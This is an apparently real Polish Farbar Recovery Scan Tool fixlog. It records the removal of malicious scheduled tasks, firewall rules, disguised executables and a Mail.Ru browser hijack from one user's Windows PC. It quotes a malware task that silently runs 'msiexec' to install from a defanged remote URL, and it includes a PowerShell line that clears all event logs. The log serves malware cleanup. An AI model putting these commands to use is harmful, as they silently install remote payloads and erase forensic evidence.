Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 11.03.2019
Uruchomiony przez joannas (13-03-2019 20:00:36) Run:1
Uruchomiony z C:\Users\joannas\Downloads
Załadowane profile: joannas (Dostępne profile: joannas)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************


        CloseProcesses:
        ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Brak pliku
        ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} =>  -> Brak pliku
        ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> Brak pliku
        ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} =>  -> Brak pliku
        ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Brak pliku
        ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
        ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> Brak pliku
        Task: {68FEAA01-3A47-4E4C-B55A-1685368B3150} - System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => "msiexec" /q /i hxxps://refreshnerer711rb.info/G5UinNOyp5.6zZ <==== UWAGA
        Task: {ACACA2F2-8091-4146-B26F-4CA8CA18299D} - System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
        Task: {D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2} - System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => C:\WINDOWS\SysWOW64\Microsoft\Protect\S-1-91-36\RB_1.3.20.90.exe <==== UWAGA
        FirewallRules: [{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}] => (Allow) C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe (Microsoft Windows -> Microsoft Corporation)
        FirewallRules: [{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}] => (Allow) C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
        C:\Program Files (x86)\Common Files\INhrB.exe
        C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe
        FirewallRules: [{64503A19-D801-4A3B-80ED-4916B76F6D5E}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe Brak pliku
        FirewallRules: [{0590994E-2B06-4CFF-89E8-0D5AE7939375}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe Brak pliku
        FirewallRules: [TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
        FirewallRules: [UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
        1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\INhrB.exe
        1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\joannas\AppData\Local\ieauOreoYaK.exe
        2019-03-13 10:09 - 2019-03-13 10:09 - 000000003 _____ () C:\Users\joannas\AppData\Local\wbem.ini
        HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.ru/cnt/10445?gp=834423
        SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
        SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {97F86C3D-A5E8-482E-BF0C-5080B7E20233} URL =
        SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
        BHO-x32: Search@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\joannas\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2019-03-13] (LLC Mail.Ru -> Mail.Ru)
        Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Brak pliku
        2019-03-13 10:09 - 2019-03-13 10:22 - 000000000 ____D C:\ProgramData\localNETService
        2019-03-13 10:09 - 2019-03-13 10:14 - 000000000 ____D C:\Users\joannas\AppData\Local\Mail.Ru
        2019-03-13 10:09 - 2019-03-13 10:09 - 000000000 ____D C:\ProgramData\Mail.Ru
        CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
        CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
        S3 mfeavfk04; \Device\mfeavfk04.sys [X]
        Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
        EmptyTemp:


*****************

Procesy zostały pomyślnie zamknięte.
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ANotepad++64 => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => nie znaleziono
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
"HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D}" => pomyślnie usunięto
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => nie znaleziono
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => nie znaleziono
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D} => nie znaleziono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3543EE5D-FE99-AD25-23F5-03742BD2251B}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{54D55C0D-2609-A62F-A35D-C02F1C8F7189}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}" => pomyślnie usunięto
C:\Program Files (x86)\Common Files\INhrB.exe => pomyślnie przeniesiono
C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe => pomyślnie przeniesiono
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64503A19-D801-4A3B-80ED-4916B76F6D5E}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0590994E-2B06-4CFF-89E8-0D5AE7939375}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
"C:\Program Files (x86)\Common Files\INhrB.exe" => nie znaleziono
C:\Users\joannas\AppData\Local\ieauOreoYaK.exe => pomyślnie przeniesiono
C:\Users\joannas\AppData\Local\wbem.ini => pomyślnie przeniesiono
HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
"HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto
HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => nie znaleziono
HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => nie znaleziono
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
HKLM\Software\Wow6432Node\Classes\CLSID\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
HKLM\Software\Classes\PROTOCOLS\Handler\sacore => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{5513F07E-936B-4E52-9B00-067394E91CC5} => pomyślnie usunięto
C:\ProgramData\localNETService => pomyślnie przeniesiono
C:\Users\joannas\AppData\Local\Mail.Ru => pomyślnie przeniesiono
C:\ProgramData\Mail.Ru => pomyślnie przeniesiono
HKLM\SOFTWARE\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\mfeavfk04 => pomyślnie usunięto
mfeavfk04 => serwis pomyślnie usunięto

========= wevtutil el | Foreach-Object {wevtutil cl "$_"} =========


========= Koniec  Powershell: =========


=========== EmptyTemp: ==========

BITS transfer queue => 9199616 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 881544853 B
Java, Flash, Steam htmlcache => 1568 B
Windows/system/drivers => 733723 B
Edge => 6036248 B
Chrome => 0 B
Firefox => 946688712 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 12732255 B
systemprofile32 => 0 B
LocalService => 48150 B
LocalService => 0 B
NetworkService => 52568 B
NetworkService => 0 B
joannas => 108308419 B

RecycleBin => 0 B
EmptyTemp: => 1.8 GB danych tymczasowych Usunięto.

================================


System wymagał restartu.

==== Koniec  Fixlog 20:02:18 ====